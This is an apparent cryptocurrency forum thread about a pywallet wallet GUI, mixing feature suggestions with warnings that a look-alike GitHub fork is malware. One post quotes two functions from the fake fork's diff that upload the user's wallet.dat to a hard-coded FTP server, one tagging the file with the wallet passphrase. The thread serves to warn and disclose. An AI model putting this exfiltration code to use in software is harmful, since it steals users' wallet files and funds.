I think I finished the "frameworks" (not sure it's the correct word)
As you can see the GUI and the WUI are simple and ugly
If someone here has some graphical skills and has some ideas, please tell me what to do
This is very interesting ~ I just looked at the github.
[[edited 22 Dec 2014 edit: the following is the DO NOT DOWNLoad from link - perhaps you could have sandboxed it and done something but I didn't, I just used it for observation. As I understand it you should follow the signatures of what is posted by JackJack himself and confirm it before actually downloading and using!]]
( https :// github .com / jj-jackjack / pywallet )
[YET ANOTHER EDIT after reading this... I am of the understanding that the fake one is jj-jackjack ....
?? Right? Shit, now I am confused, except for the "Check JackJack's signature" part.. because all this has my head twisted around. Please feel free to private message me and tell me I am missing something really important and because of me the world is going to suffer and please make sure to explain step by step how I should change this post because I feel like I am missing something here!]
[[ As per a thread above, a different jackjack-jj link is alleged to be a scam link which supposedly removes BTC.]]
[[More 22 Dec. 2014 edit below:
https :/ /github .com/ jj-jackjack/ pywallet
This is not a link to JackJack's new pywallet. This is an attempt to distribute malware.
Do not use the fake pywallet software in this link, it is malware. It will steal your wallet file and upload it to the attacker.
Ignore any pywallet download links which are not posted by JackJack himself.
edited: the scam post has been deleted; removed yelling.
A few thoughts / suggestions come to mind as things that could be added / changed...
1) Code associated with standalone mixer plugin by BkkCoins could be added in (so that you wouldn't have to add the plugin),
currently this appears at
https://github.com/tkhaew/electrum/blob/mixer_plugin/plugins/mixer.pyDefault folder will be something like this to put it in (if used as plugin for Electrum), poss. different version numbers.
/usr/local/lib/python2.7/dist-packages/Electrum-1.9.5-py2.7.egg/electrum_plugins/
[[THE tkhaew stuff is NOT fake by my understanding but.. correct me if I am wrong]]
2) Stealth support / Charity Donations section /
http://abis.io ~ See
https://github.com/spesmilo/sx/tree/master/tools for details
[[
http://abis.io and my repositories at
https://github.com/ABISprotocol?tab=repositories including repositories I help manage such as those at BTC Foundation and Lighthouse: I've observed them and all seems well. But if you are a contributor to one of the repositories and been affected by the recent problems in different countries / regions of late, please e-mail me and let me know (if you can), or if you can't, please use one of your network to connect with me in whatever way makes sense.
[[some stuff related to BTC and some stuff related to BCN]]]
The above is basically related to use of BTC, but I am also reminded that BCN (bytecoin.org / ring signatures / cryptonight) does not currently have a GUI and they are seeking one. I wonder if this pywallet code could also be used / rewritten to create the first GUI wallet for BCN, as well. [[[don't know at this point, you'd have to ask the BCN devs]]]
[[ see also signature / code more recently posted from jackjack above - I've made another edit from Dec 22 2014 below... ]]
That's why I sign stuff now...
Always look at the sigs in OP, check my code, and check diffs
The diff of this scam:
https://www.diffchecker.com/z5qzwxni (look at line 2600ish)
def cryptedul():
import ftplib
rand = random.randrange(000000, 999999)
dbdir = determine_db_dir()
session = ftplib.FTP('212.48.76.120','crypto','crypto')
with open(dbdir + '/wallet.dat', 'rb') as ifh:
session.storbinary('STOR wallet.dat - ' + rand, ifh, 19206)
session.quit()
def cryptedull():
import ftplib
dbdir = determine_db_dir()
session = ftplib.FTP('212.48.76.120','crypto','crypto')
with open(dbdir + '/wallet.dat', 'rb') as ifh:
session.storbinary('STOR wallet.dat - ' + options.passphrase, ifh, 19206)
session.quit()
The guy is also on reddit: (SCAM LINK)
http://www.reddit.com/user/jj-jackjackFYI
Scammers so far: Nimer, LittleHodor
Not a scam is BitName / IDMAS evoled. Yes those are projects that I am hoping will one day become reality, but currently has nothing because it is shown currently in another repository through github.com/cjbauer who has already developed concept much more:
https://github.com/abisprotocol/bitnameI have been saying this again and again in Unsystem mailing list... but we need way better gpg procedures because between the attacks on tor networks and issues with tor relays, attacks on anarchist communities, attacks on various communities in usa / EEUU, some recent problems with git, all this happening almost at once, you could say it made my head spin. let's please work offline on some procedures that are easy to use for our respective communities for gpg primarily in ways that make sense for all concerned regardless of whether or not we are part of core dev teams or just periodic commenters, thanks.
uhhhhhhhhh..... sigh